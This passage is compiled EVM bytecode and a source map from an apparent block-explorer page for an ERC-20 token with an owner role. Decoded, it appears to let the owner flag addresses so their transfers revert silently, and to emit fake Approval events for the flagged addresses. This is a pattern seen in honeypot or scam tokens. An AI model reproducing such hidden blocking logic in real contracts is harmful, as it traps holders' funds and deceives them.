008135905061121d816111f7565b92915050565b6000806040838503121561123a57611239611185565b5b6000611248858286016111d8565b92505060206112598582860161120e565b9150509250929050565b60008115159050919050565b61127881611263565b82525050565b6000602082019050611293600083018461126f565b92915050565b6112a2816111ed565b82525050565b60006020820190506112bd6000830184611299565b92915050565b6000806000606084860312156112dc576112db611185565b5b60006112ea868287016111d8565b93505060206112fb868287016111d8565b925050604061130c8682870161120e565b9150509250925092565b600060ff82169050919050565b61132c81611316565b82525050565b60006020820190506113476000830184611323565b92915050565b60006020828403121561136357611362611185565b5b6000611371848285016111d8565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261139f5761139e61137a565b5b8235905067ffffffffffffffff8111156113bc576113bb61137f565b5b6020830191508360208202830111156113d8576113d7611384565b5b9250929050565b600080602083850312156113f6576113f5611185565b5b600083013567ffffffffffffffff8111156114145761141361118a565b5b61142085828601611389565b92509250509250929050565b611435816111af565b82525050565b6000602082019050611450600083018461142c565b92915050565b6000806040838503121561146d5761146c611185565b5b600061147b858286016111d8565b925050602061148c858286016111d8565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114dd57607f821691505b6020821081036114f0576114ef611496565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611530826111ed565b915061153b836111ed565b9250828201905080821115611553576115526114f6565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000819050919050565b6000819050919050565b60006115b76115b26115ad84611588565b611592565b6111ed565b9050919050565b6115c78161159c565b82525050565b60006020820190506115e260008301846115be565b92915050565b60006115f3826111ed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611625576116246114f6565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061168c6025836110de565b915061169782611630565b604082019050919050565b600060208201905081810360008301526116bb8161167f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061171e6026836110de565b9150611729826116c2565b604082019050919050565b6000602082019050818103600083015261174d81611711565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117b06024836110de565b91506117bb82611754565b604082019050919050565b600060208201905081810360008301526117df816117a3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118426022836110de565b915061184d826117e6565b604082019050919050565b6000602082019050818103600083015261187181611835565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118ae601d836110de565b91506118b982611878565b602082019050919050565b600060208201905081810360008301526118dd816118a1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119406025836110de565b915061194b826118e4565b604082019050919050565b6000602082019050818103600083015261196f81611933565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119d26023836110de565b91506119dd82611976565b604082019050919050565b60006020820190508181036000830152611a01816119c5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a646026836110de565b9150611a6f82611a08565b604082019050919050565b60006020820190508181036000830152611a9381611a57565b9050919050565b50565b6000611aaa6000836110de565b9150611ab582611a9a565b600082019050919050565b60006020820190508181036000830152611ad981611a9d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b166020836110de565b9150611b2182611ae0565b602082019050919050565b60006020820190508181036000830152611b4581611b09565b905091905056fea264697066735822122010d28aaf4dabd90feff12ac5421d6947acfca0257b17929f43a63267db356b8c64736f6c63430008120033
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806377a1736b116100a2578063a06c1a3311610071578063a06c1a33146102bc578063a457c2d7146102d8578063a9059cbb14610308578063dd62ed3e14610338578063f2fde38b146103685761010b565b806377a1736b146102345780638da5cb5b1461025057806390135fe41461026e57806395d89b411461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806370a08231146101fa578063715018a61461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611163565b60405180910390f35b61014860048036038101906101439190611223565b610416565b604051610155919061127e565b60405180910390f35b610166610439565b60405161017391906112a8565b60405180910390f35b610196600480360381019061019191906112c3565b610443565b6040516101a3919061127e565b60405180910390f35b6101b4610472565b6040516101c19190611332565b60405180910390f35b6101e460048036038101906101df9190611223565b61047b565b6040516101f1919061127e565b60405180910390f35b610214600480360381019061020f919061134d565b6104b2565b60405161022191906112a8565b60405180910390f35b6102326104fb565b005b61024e600480360381019061024991906113df565b61050f565b005b610258610652565b604051610265919061143b565b60405180910390f35b6102886004803603810190610283919061134d565b61067b565b604051610295919061127e565b60405180910390f35b6102a66106d1565b6040516102b39190611163565b60405180910390f35b6102d660048036038101906102d191906113df565b610763565b005b6102f260048036038101906102ed9190611223565b610810565b6040516102ff919061127e565b60405180910390f35b610322600480360381019061031d9190611223565b610887565b60405161032f919061127e565b60405180910390f35b610352600480360381019061034d9190611456565b6108aa565b60405161035f91906112a8565b60405180910390f35b610382600480360381019061037d919061134d565b610931565b005b606060068054610393906114c5565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906114c5565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216109b4565b905061042e8185856109bc565b600191505092915050565b6000600454905090565b60008061044e6109b4565b905061045b858285610b85565b610466858585610c11565b60019150509392505050565b60006012905090565b6000806104866109b4565b90506104a781858561049885896108aa565b6104a29190611525565b6109bc565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610503610f87565b61050d6000611005565b565b610517610f87565b60005b8282905081101561064d5760016002600085858581811061053e5761053d611559565b5b9050602002016020810190610553919061134d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106105ce576105cd611559565b5b90506020020160208101906105e3919061134d565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92569d3c21bcecceda100000060405161063291906115cd565b60405180910390a38080610645906115e8565b91505061051a565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6060600780546106e0906114c5565b80601f016020809104026020016040519081016040528092919081815260200182805461070c906114c5565b80156107595780601f1061072e57610100808354040283529160200191610759565b820191906000526020600020905b81548152906001019060200180831161073c57829003601f168201915b5050505050905090565b61076b610f87565b60005b8282905081101561080b5760006002600085858581811061079257610791611559565b5b90506020020160208101906107a7919061134d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610803906115e8565b91505061076e565b505050565b60008061081b6109b4565b9050600061082982866108aa565b90508381101561086e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610865906116a2565b60405180910390fd5b61087b82868684036109bc565b60019250505092915050565b6000806108926109b4565b905061089f818585610c11565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610939610f87565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099f90611734565b60405180910390fd5b6109b181611005565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a22906117c6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9190611858565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b7891906112a8565b60405180910390a3505050565b6000610b9184846108aa565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c0b5781811015610bfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf4906118c4565b60405180910390fd5b610c0a84848484036109bc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7790611956565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce6906119e8565b60405180910390fd5b610cfa8383836110c9565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7890611a7a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610eb55750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610f115760011515600560009054906101000a900460ff16151514610f10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0790611ac0565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f6e91906112a8565b60405180910390a3610f818484846110ce565b50505050565b610f8f6109b4565b73ffffffffffffffffffffffffffffffffffffffff16610fad610652565b73ffffffffffffffffffffffffffffffffffffffff1614611003576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ffa90611b2c565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561110d5780820151818401526020810190506110f2565b60008484015250505050565b6000601f19601f8301169050919050565b6000611135826110d3565b61113f81856110de565b935061114f8185602086016110ef565b61115881611119565b840191505092915050565b6000602082019050818103600083015261117d818461112a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111ba8261118f565b9050919050565b6111ca816111af565b81146111d557600080fd5b50565b6000813590506111e7816111c1565b92915050565b6000819050919050565b611200816111ed565b811461120b57600080fd5b50565b60008135905061121d816111f7565b92915050565b6000806040838503121561123a57611239611185565b5b6000611248858286016111d8565b92505060206112598582860161120e565b9150509250929050565b60008115159050919050565b61127881611263565b82525050565b6000602082019050611293600083018461126f565b92915050565b6112a2816111ed565b82525050565b60006020820190506112bd6000830184611299565b92915050565b6000806000606084860312156112dc576112db611185565b5b60006112ea868287016111d8565b93505060206112fb868287016111d8565b925050604061130c8682870161120e565b9150509250925092565b600060ff82169050919050565b61132c81611316565b82525050565b60006020820190506113476000830184611323565b92915050565b60006020828403121561136357611362611185565b5b6000611371848285016111d8565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261139f5761139e61137a565b5b8235905067ffffffffffffffff8111156113bc576113bb61137f565b5b6020830191508360208202830111156113d8576113d7611384565b5b9250929050565b600080602083850312156113f6576113f5611185565b5b600083013567ffffffffffffffff8111156114145761141361118a565b5b61142085828601611389565b92509250509250929050565b611435816111af565b82525050565b6000602082019050611450600083018461142c565b92915050565b6000806040838503121561146d5761146c611185565b5b600061147b858286016111d8565b925050602061148c858286016111d8565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114dd57607f821691505b6020821081036114f0576114ef611496565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611530826111ed565b915061153b836111ed565b9250828201905080821115611553576115526114f6565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000819050919050565b6000819050919050565b60006115b76115b26115ad84611588565b611592565b6111ed565b9050919050565b6115c78161159c565b82525050565b60006020820190506115e260008301846115be565b92915050565b60006115f3826111ed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611625576116246114f6565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061168c6025836110de565b915061169782611630565b604082019050919050565b600060208201905081810360008301526116bb8161167f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061171e6026836110de565b9150611729826116c2565b604082019050919050565b6000602082019050818103600083015261174d81611711565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117b06024836110de565b91506117bb82611754565b604082019050919050565b600060208201905081810360008301526117df816117a3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118426022836110de565b915061184d826117e6565b604082019050919050565b6000602082019050818103600083015261187181611835565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118ae601d836110de565b91506118b982611878565b602082019050919050565b600060208201905081810360008301526118dd816118a1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119406025836110de565b915061194b826118e4565b604082019050919050565b6000602082019050818103600083015261196f81611933565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119d26023836110de565b91506119dd82611976565b604082019050919050565b60006020820190508181036000830152611a01816119c5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a646026836110de565b9150611a6f82611a08565b604082019050919050565b60006020820190508181036000830152611a9381611a57565b9050919050565b50565b6000611aaa6000836110de565b9150611ab582611a9a565b600082019050919050565b60006020820190508181036000830152611ad981611a9d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b166020836110de565b9150611b2182611ae0565b602082019050919050565b60006020820190508181036000830152611b4581611b09565b905091905056fea264697066735822122010d28aaf4dabd90feff12ac5421d6947acfca0257b17929f43a63267db356b8c64736f6c63430008120033
Deployed Bytecode Sourcemap
21819:141:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8708:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11690:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10459:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12471:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9670:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13175:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10630:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5797:103;;;:::i;:::-;;9771:275;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5156:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10268:126;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8927:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10054:206;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13916:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10963:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11219:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6055:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8708:100;8762:13;8795:5;8788:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8708:100;:::o;11690:201::-;11773:4;11790:13;11806:12;:10;:12::i;:::-;11790:28;;11829:32;11838:5;11845:7;11854:6;11829:8;:32::i;:::-;11879:4;11872:11;;;11690:201;;;;:::o;10459:108::-;10520:7;10547:12;;10540:19;;10459:108;:::o;12471:295::-;12602:4;12619:15;12637:12;:10;:12::i;:::-;12619:30;;12660:38;12676:4;12682:7;12691:6;12660:15;:38::i;:::-;12709:27;12719:4;12725:2;12729:6;12709:9;:27::i;:::-;12754:4;12747:11;;;12471:295;;;;;:::o;9670:93::-;9728:5;9753:2;9746:9;;9670:93;:::o;13175:238::-;13263:4;13280:13;13296:12;:10;:12::i;:::-;13280:28;;13319:64;13328:5;13335:7;13372:10;13344:25;13354:5;13361:7;13344:9;:25::i;:::-;:38;;;;:::i;:::-;13319:8;:64::i;:::-;13401:4;13394:11;;;13175:238;;;;:::o;10630:127::-;10704:7;10731:9;:18;10741:7;10731:18;;;;;;;;;;;;;;;;10724:25;;10630:127;;;:::o;5797:103::-;5042:13;:11;:13::i;:::-;5862:30:::1;5889:1;5862:18;:30::i;:::-;5797:103::o:0;9771:275::-;5042:13;:11;:13::i;:::-;9856:9:::1;9851:188;9875:11;;:18;;9871:1;:22;9851:188;;;9952:4;9915:18;:34;9934:11;;9946:1;9934:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9915:34;;;;;;;;;;;;;;;;:41;;;;;;;;;;;;;;;;;;10009:4;9976:51;;9985:11;;9997:1;9985:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9976:51;;;10016:10;9976:51;;;;;;:::i;:::-;;;;;;;;9895:3;;;;;:::i;:::-;;;;9851:188;;;;9771:275:::0;;:::o;5156:87::-;5202:7;5229:6;;;;;;;;;;;5222:13;;5156:87;:::o;10268:126::-;10333:4;10357:18;:29;10376:9;10357:29;;;;;;;;;;;;;;;;;;;;;;;;;10350:36;;10268:126;;;:::o;8927:104::-;8983:13;9016:7;9009:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8927:104;:::o;10054:206::-;5042:13;:11;:13::i;:::-;10140:9:::1;10135:118;10159:11;;:18;;10155:1;:22;10135:118;;;10236:5;10199:18;:34;10218:11;;10230:1;10218:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10199:34;;;;;;;;;;;;;;;;:42;;;;;;;;;;;;;;;;;;10179:3;;;;;:::i;:::-;;;;10135:118;;;;10054:206:::0;;:::o;13916:436::-;14009:4;14026:13;14042:12;:10;:12::i;:::-;14026:28;;14065:24;14092:25;14102:5;14109:7;14092:9;:25::i;:::-;14065:52;;14156:15;14136:16;:35;;14128:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14249:60;14258:5;14265:7;14293:15;14274:16;:34;14249:8;:60::i;:::-;14340:4;14333:11;;;;13916:436;;;;:::o;10963:193::-;11042:4;11059:13;11075:12;:10;:12::i;:::-;11059:28;;11098;11108:5;11115:2;11119:6;11098:9;:28::i;:::-;11144:4;11137:11;;;10963:193;;;;:::o;11219:151::-;11308:7;11335:11;:18;11347:5;11335:18;;;;;;;;;;;;;;;:27;11354:7;11335:27;;;;;;;;;;;;;;;;11328:34;;11219:151;;;;:::o;6055:201::-;5042:13;:11;:13::i;:::-;6164:1:::1;6144:22;;:8;:22;;::::0;6136:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6220:28;6239:8;6220:18;:28::i;:::-;6055:201:::0;:::o;3865:98::-;3918:7;3945:10;3938:17;;3865:98;:::o;18058:380::-;18211:1;18194:19;;:5;:19;;;18186:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18292:1;18273:21;;:7;:21;;;18265:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18376:6;18346:11;:18;18358:5;18346:18;;;;;;;;;;;;;;;:27;18365:7;18346:27;;;;;;;;;;;;;;;:36;;;;18414:7;18398:32;;18407:5;18398:32;;;18423:6;18398:32;;;;;;:::i;:::-;;;;;;;;18058:380;;;:::o;18729:453::-;18864:24;18891:25;18901:5;18908:7;18891:9;:25::i;:::-;18864:52;;18951:17;18931:16;:37;18927:248;;19013:6;18993:16;:26;;18985:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19097:51;19106:5;19113:7;19141:6;19122:16;:25;19097:8;:51::i;:::-;18927:248;18853:329;18729:453;;;:::o;14822:955::-;14969:1;14953:18;;:4;:18;;;14945:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15046:1;15032:16;;:2;:16;;;15024:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15101:38;15122:4;15128:2;15132:6;15101:20;:38::i;:::-;15152:19;15174:9;:15;15184:4;15174:15;;;;;;;;;;;;;;;;15152:37;;15223:6;15208:11;:21;;15200:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15340:6;15326:11;:20;15308:9;:15;15318:4;15308:15;;;;;;;;;;;;;;;:38;;;;15543:6;15526:9;:13;15536:2;15526:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15575:18;:24;15594:4;15575:24;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;15603:18;:22;15622:2;15603:22;;;;;;;;;;;;;;;;;;;;;;;;;15575:50;15571:102;;;15664:4;15635:33;;:25;;;;;;;;;;;:33;;;15627:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;15571:102;15708:2;15693:26;;15702:4;15693:26;;;15712:6;15693:26;;;;;;:::i;:::-;;;;;;;;15732:37;15752:4;15758:2;15762:6;15732:19;:37::i;:::-;14934:843;14822:955;;;:::o;5321:132::-;5396:12;:10;:12::i;:::-;5385:23;;:7;:5;:7::i;:::-;:23;;;5377:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5321:132::o;6416:191::-;6490:16;6509:6;;;;;;;;;;;6490:25;;6535:8;6526:6;;:17;;;;;;;;;;;;;;;;;;6590:8;6559:40;;6580:8;6559:40;;;;;;;;;;;;6479:128;6416:191;:::o;20514:125::-;;;;:::o;19786:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:117::-;5297:1;5294;5287:12;5311:117;5420:1;5417;5410:12;5434:117;5543:1;5540;5533:12;5574:568;5647:8;5657:6;5707:3;5700:4;5692:6;5688:17;5684:27;5674:122;;5715:79;;:::i;:::-;5674:122;5828:6;5815:20;5805:30;;5858:18;5850:6;5847:30;5844:117;;;5880:79;;:::i;:::-;5844:117;5994:4;5986:6;5982:17;5970:29;;6048:3;6040:4;6032:6;6028:17;6018:8;6014:32;6011:41;6008:128;;;6055:79;;:::i;:::-;6008:128;5574:568;;;;;:::o;6148:559::-;6234:6;6242;6291:2;6279:9;6270:7;6266:23;6262:32;6259:119;;;6297:79;;:::i;:::-;6259:119;6445:1;6434:9;6430:17;6417:31;6475:18;6467:6;6464:30;6461:117;;;6497:79;;:::i;:::-;6461:117;6610:80;6682:7;6673:6;6662:9;6658:22;6610:80;:::i;:::-;6592:98;;;;6388:312;6148:559;;;;;:::o;6713:118::-;6800:24;6818:5;6800:24;:::i;:::-;6795:3;6788:37;6713:118;;:::o;6837:222::-;6930:4;6968:2;6957:9;6953:18;6945:26;;6981:71;7049:1;7038:9;7034:17;7025:6;6981:71;:::i;:::-;6837:222;;;;:::o;7065:474::-;7133:6